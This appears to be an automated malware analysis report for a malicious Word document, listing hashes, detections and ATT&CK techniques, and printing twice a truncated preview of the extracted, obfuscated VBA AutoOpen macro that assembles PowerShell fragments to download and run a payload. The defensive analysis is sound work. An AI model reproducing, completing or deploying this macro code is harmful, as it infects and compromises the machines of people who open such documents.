Office (OLE) malware analysis — malicious · c20017909e991e7e

MALICIOUS

Office (OLE)

132.0 KB Created: 2018-02-09 06:56:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: e7b411ba54f2ea14b85f4ef67415c000 SHA-1: 4b11b4f4bb4a204b05b92c260fa4d0070bd6e250 SHA-256: c20017909e991e7e2d6ee57af7eca6367d1993b4668e1fc77d61e12315ae30f7

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is designed to execute a secondary payload using the Shell() function. This indicates a typical macro-based malware delivery mechanism, likely intended to download and run further malicious code.

Heuristics 7

ClamAV: Doc.Trojan.Obfuscated-6444812-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Obfuscated-6444812-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 24978 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	24978 bytes
SHA-256: `b9ad9506f1aac65641e8e800714dd854f57dfa2849f128b6deb1c27d9183c162`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "IcrNnJOl" Sub AutoOpen() On Error Resume Next uzmahhsmP = VuXGBVYfEm - sMvKHzJuIGiXk / (1274044 + czQvltpXvYpLt - 8637447 + aKbtCmrQZj) isGTmWmzM = aOIAwDozmSmPB - fYwrEBkhqMDAi / (887351 + BCLjzuLB - 5215868 + wwrdHwSrSnOavv) KIsYwzzUk = kPbjBtUWVwFDs - iPkJQRu / (5143856 + PVqBnEdw - 5859056 + AtrUjqYTr) Application.Run "wZBwHjC", fZjkQOudkdip FwpHQpphM = ESwKILNKsjRrz - psKquBTrzDV / (1649180 + OaMzXRIavE - 6731603 + JWfjmZOzPRYi) wmLVMUtoz = wkjjtZrAuobH - inLLiHJKwChz / (7174992 + mNaKujX - 4504894 + zDfoHOXkDrBjhA) End Sub Function fZjkQOudkdip() On Error Resume Next TYnzYItEmww = fEOmzup - KZbUJlt / (6186483 + zPuDwZHqXGdmL - 467291 + AKZtDNOVKa) dfBsjJhHt = WvMuvzVIsjo - iiHwZnMPzXBTwM / (9405 + aiujdQCLicK - 6069925 + CKqLMqOwR) BoZLjoBnAw = hzKjztsvjzthJ - EUScvSzcjwwML / (1532194 + VlfJuNlSjDRl - 6298567 + hXUABHsXlAw) TGdifiDpI = jqBzpzi + Mid(("AwclEiOscwDoG6m1+6m1ngbd+gbd6mGOH+GOH1+6mGOH+GO'+'H1v:pu6m1+6m1b6m1+6m1lic + kDirQ6m1+6mNuJuwmhMiPoZaWpMChvm"), 14, 75) PWEnopC = SBjZijQBwbc - KAtwzfKC / (1629575 + GzQjBWNWKv - 7247637 + oqoMWRbDSk) lLjiKIUEkw = bXjQPLiN - TzvkIvfu / (7620598 + QjakLDKnIsb - 1010491 + VrpLRFw) SwkiotnO = bhYGqvDD - mhPqTbAnYNE / (4774177 + VlNwZsTjOo - 7862670 + pwBdUIGjh) kGqjKoj = ERLjmikKNLNYP + Mid(("ZsoKIjmPwsQCHUJtKPbtKdcYUYXqmNm1+6m1DiGOH+GOH+6m1+6m1k6m1+6m1D6m1+6m1tqS"), 31, 39) HnLimDWYu = ulCMntuVLkrXs - XiczJDFwprO / (8280320 + kXbfLVwuhm - 7255507 + kZmvwqiBO) DowLih = XnoOpmwvKwwVK - jEjCwfqrqlZdSC / (8234177 + fpJwzor - 9304081 + JwlcnRPPnLu) mnklRs = jFjzfwCp - TtEJSHLN / (9754044 + NjWnhEPDUKNirw - 8201121 + kazUroGTpFjSVK) IkLRj = upLCQoYt + Mid(("cmizQ+kDie-Ite6m1'+'+GOHgbd+gbd+GOH6m1m6m1+6m1kDi)6m1+6m1(6m1+6m1TDdS6mGOH+GOH1+6m1'+'DC);break6gbd+gbd'+'m1gbd+gbd+6'+'m1;6m1+6m1}6mgbd+gbd1+gbd+gbd'+'6mGOH+GOH1catch{}6m1+6m1}6mpQIqqtFJIVNXD"), 6, 174) iqpzZSGrsBL = sPthfwp - ISSWlOi / (841224 + cCzbXzhKGL - 8021247 + OQpSYGEzGbV) iSbcZAUEi = DYzCnRo - LJzGUZVS / (2256624 + YnzbtCdENI - 4937753 + RBhzYzzf) hiaXj = oWiPFSizwl - ljCiBciwZiEj / (7154946 + rwZXBVV - 6228239 + jQUMoku) LDjRsA = CpQhaJS + Mid(("KJfOtjUZQmUojHJoCvlqnObpGnZk6m1+6gbd+gbdm1T6m1+6m1GOH+GOHDdns6Ggbd+gbdOH+GOHm1+6m1adasd.GOH+GOHngbd+gbde6m1goTAXjDYZj"), 29, 80) fzwTW = UAGokqtKOWJazP - FjTRjPqMi / (5344250 + IzjIwZbEAUaLz - 4891332 + BZOljRHXPzf) vMRTwXAq = PjiobMvhwaFX - wsOwfXTsFNQz / (8645522 + XBaUJSsLYWjwzD - 8365584 + bUqChZtakcL) pqpSajEVoz = KSOqiRYjVFwFq - UsQjXQAamwHqM / (9535634 + zjjHDBFH - 8028289 + hfKJVXlLu) mjbSK = PXnViwzw + Mid(("P1) -gbd+gbdrep'+'LACe ([Ch'+'aR]115+[ChaR]67+[GOH+GOHChgbd'+'+gbdaGZTkXpFnnTzqh"), 2, 67) aiEOtvpZ = RisEaYWWPznl - kaRpkqRQY / (4280476 + SsGojcMOSYp - 1311686 + dElnzHnXIq) AkOJiIl = kmOKwRQtM - miRhpnlY / (3744098 + uTtMfEiQRiIJB - 8180265 + uNBQAIw) jndVSLUMjwI = LqWUFJUBwpAVRs - itmzbdE / (5567575 + bcvakIShzZiV - 1852686 + YHzhJTAUnBLX) WlEvZlkE = AKDEvoj + Mid(("kiEplacE(gbd+gbd('+'[chAr]109+[chAr]gbd+gbd5gbd+gbd3+[chArgbd+gbd]119),[STrIgbd+gbdNG][chAr]124).rEp'+'lacE(([chAr]57+[chAr]'+'8g'+'bd+gbd0+[c'+'hAr]119),[dzcziVriwYKBiXkNR"), 3, 153) UAVrv = QqWTYrJjUJOsiw - JjGpuONlEXcIbH / (3916857 + vtDQTzhwvrfCN - 9932813 + qUMEJmnTf) JazalakDJ = FRvviiY - SSwbfbL / (9722216 + tCjLYFGm - 7762099 + DLFHZYNNf) wlnvz = BMJGBujSOpls - cuRvshMo / (1603977 + TVpMLZDSNjMIjt - 5507886 + dYoYzdKA) MrnvREsqiS = NJUQHNpsdN + Mid(("EXznjawNJVJHnsZrCZjsAvVwilCFMpfuThiQ1Wk6m1+'+'6m1Di 6m1+6m1+ 6m1+GOH+GOH6m1TD6m1+6m1dN6m1GO'+'H+GOH+6m1gbd+gbdSB + (kD6m1+6m1i.6m1+6m'+'1ex6GOH+GOHm1+6GOH+GOHm1kDi+kDie6m1+6m1k6m1+6m1Di)gbd+gbd;f6m1+6m1oreach(TDd6mBCG"), 37, 178) YLtsPJL = hVtLWXMw - NYSjEoAkvp / (2164034 + jzQbzhNPPOCrw - 9106662 + vNcGzCJ) abkpsmzwECr = kJlciwJXAaXwYc - ZpwiEzVbmIlF / (4403136 + jNlawjRMF - 6773892 + GrCQZziSd) ... (truncated)

SHA-256: b9ad9506f1aac65641e8e800714dd854f57dfa2849f128b6deb1c27d9183c162

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "IcrNnJOl"
Sub AutoOpen()
On Error Resume Next
uzmahhsmP = VuXGBVYfEm - sMvKHzJuIGiXk / (1274044 + czQvltpXvYpLt - 8637447 + aKbtCmrQZj)
isGTmWmzM = aOIAwDozmSmPB - fYwrEBkhqMDAi / (887351 + BCLjzuLB - 5215868 + wwrdHwSrSnOavv)
KIsYwzzUk = kPbjBtUWVwFDs - iPkJQRu / (5143856 + PVqBnEdw - 5859056 + AtrUjqYTr)
Application.Run "wZBwHjC", fZjkQOudkdip
FwpHQpphM = ESwKILNKsjRrz - psKquBTrzDV / (1649180 + OaMzXRIavE - 6731603 + JWfjmZOzPRYi)
wmLVMUtoz = wkjjtZrAuobH - inLLiHJKwChz / (7174992 + mNaKujX - 4504894 + zDfoHOXkDrBjhA)
End Sub
Function fZjkQOudkdip()
On Error Resume Next
TYnzYItEmww = fEOmzup - KZbUJlt / (6186483 + zPuDwZHqXGdmL - 467291 + AKZtDNOVKa)
dfBsjJhHt = WvMuvzVIsjo - iiHwZnMPzXBTwM / (9405 + aiujdQCLicK - 6069925 + CKqLMqOwR)
BoZLjoBnAw = hzKjztsvjzthJ - EUScvSzcjwwML / (1532194 + VlfJuNlSjDRl - 6298567 + hXUABHsXlAw)
TGdifiDpI = jqBzpzi + Mid(("AwclEiOscwDoG6m1+6m1ngbd+gbd6mGOH+GOH1+6mGOH+GO'+'H1v:pu6m1+6m1b6m1+6m1lic + kDirQ6m1+6mNuJuwmhMiPoZaWpMChvm"), 14, 75)
PWEnopC = SBjZijQBwbc - KAtwzfKC / (1629575 + GzQjBWNWKv - 7247637 + oqoMWRbDSk)
lLjiKIUEkw = bXjQPLiN - TzvkIvfu / (7620598 + QjakLDKnIsb - 1010491 + VrpLRFw)
SwkiotnO = bhYGqvDD - mhPqTbAnYNE / (4774177 + VlNwZsTjOo - 7862670 + pwBdUIGjh)
kGqjKoj = ERLjmikKNLNYP + Mid(("ZsoKIjmPwsQCHUJtKPbtKdcYUYXqmNm1+6m1DiGOH+GOH+6m1+6m1k6m1+6m1D6m1+6m1tqS"), 31, 39)
HnLimDWYu = ulCMntuVLkrXs - XiczJDFwprO / (8280320 + kXbfLVwuhm - 7255507 + kZmvwqiBO)
DowLih = XnoOpmwvKwwVK - jEjCwfqrqlZdSC / (8234177 + fpJwzor - 9304081 + JwlcnRPPnLu)
mnklRs = jFjzfwCp - TtEJSHLN / (9754044 + NjWnhEPDUKNirw - 8201121 + kazUroGTpFjSVK)
IkLRj = upLCQoYt + Mid(("cmizQ+kDie-Ite6m1'+'+GOHgbd+gbd+GOH6m1m6m1+6m1kDi)6m1+6m1(6m1+6m1TDdS6mGOH+GOH1+6m1'+'DC);break6gbd+gbd'+'m1gbd+gbd+6'+'m1;6m1+6m1}6mgbd+gbd1+gbd+gbd'+'6mGOH+GOH1catch{}6m1+6m1}6mpQIqqtFJIVNXD"), 6, 174)
iqpzZSGrsBL = sPthfwp - ISSWlOi / (841224 + cCzbXzhKGL - 8021247 + OQpSYGEzGbV)
iSbcZAUEi = DYzCnRo - LJzGUZVS / (2256624 + YnzbtCdENI - 4937753 + RBhzYzzf)
hiaXj = oWiPFSizwl - ljCiBciwZiEj / (7154946 + rwZXBVV - 6228239 + jQUMoku)
LDjRsA = CpQhaJS + Mid(("KJfOtjUZQmUojHJoCvlqnObpGnZk6m1+6gbd+gbdm1T6m1+6m1GOH+GOHDdns6Ggbd+gbdOH+GOHm1+6m1adasd.GOH+GOHngbd+gbde6m1goTAXjDYZj"), 29, 80)
fzwTW = UAGokqtKOWJazP - FjTRjPqMi / (5344250 + IzjIwZbEAUaLz - 4891332 + BZOljRHXPzf)
vMRTwXAq = PjiobMvhwaFX - wsOwfXTsFNQz / (8645522 + XBaUJSsLYWjwzD - 8365584 + bUqChZtakcL)
pqpSajEVoz = KSOqiRYjVFwFq - UsQjXQAamwHqM / (9535634 + zjjHDBFH - 8028289 + hfKJVXlLu)
mjbSK = PXnViwzw + Mid(("P1) -gbd+gbdrep'+'LACe ([Ch'+'aR]115+[ChaR]67+[GOH+GOHChgbd'+'+gbdaGZTkXpFnnTzqh"), 2, 67)
aiEOtvpZ = RisEaYWWPznl - kaRpkqRQY / (4280476 + SsGojcMOSYp - 1311686 + dElnzHnXIq)
AkOJiIl = kmOKwRQtM - miRhpnlY / (3744098 + uTtMfEiQRiIJB - 8180265 + uNBQAIw)
jndVSLUMjwI = LqWUFJUBwpAVRs - itmzbdE / (5567575 + bcvakIShzZiV - 1852686 + YHzhJTAUnBLX)
WlEvZlkE = AKDEvoj + Mid(("kiEplacE(gbd+gbd('+'[chAr]109+[chAr]gbd+gbd5gbd+gbd3+[chArgbd+gbd]119),[STrIgbd+gbdNG][chAr]124).rEp'+'lacE(([chAr]57+[chAr]'+'8g'+'bd+gbd0+[c'+'hAr]119),[dzcziVriwYKBiXkNR"), 3, 153)
UAVrv = QqWTYrJjUJOsiw - JjGpuONlEXcIbH / (3916857 + vtDQTzhwvrfCN - 9932813 + qUMEJmnTf)
JazalakDJ = FRvviiY - SSwbfbL / (9722216 + tCjLYFGm - 7762099 + DLFHZYNNf)
wlnvz = BMJGBujSOpls - cuRvshMo / (1603977 + TVpMLZDSNjMIjt - 5507886 + dYoYzdKA)
MrnvREsqiS = NJUQHNpsdN + Mid(("EXznjawNJVJHnsZrCZjsAvVwilCFMpfuThiQ1Wk6m1+'+'6m1Di 6m1+6m1+ 6m1+GOH+GOH6m1TD6m1+6m1dN6m1GO'+'H+GOH+6m1gbd+gbdSB + (kD6m1+6m1i.6m1+6m'+'1ex6GOH+GOHm1+6GOH+GOHm1kDi+kDie6m1+6m1k6m1+6m1Di)gbd+gbd;f6m1+6m1oreach(TDd6mBCG"), 37, 178)
YLtsPJL = hVtLWXMw - NYSjEoAkvp / (2164034 + jzQbzhNPPOCrw - 9106662 + vNcGzCJ)
abkpsmzwECr = kJlciwJXAaXwYc - ZpwiEzVbmIlF / (4403136 + jNlawjRMF - 6773892 + GrCQZziSd)
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.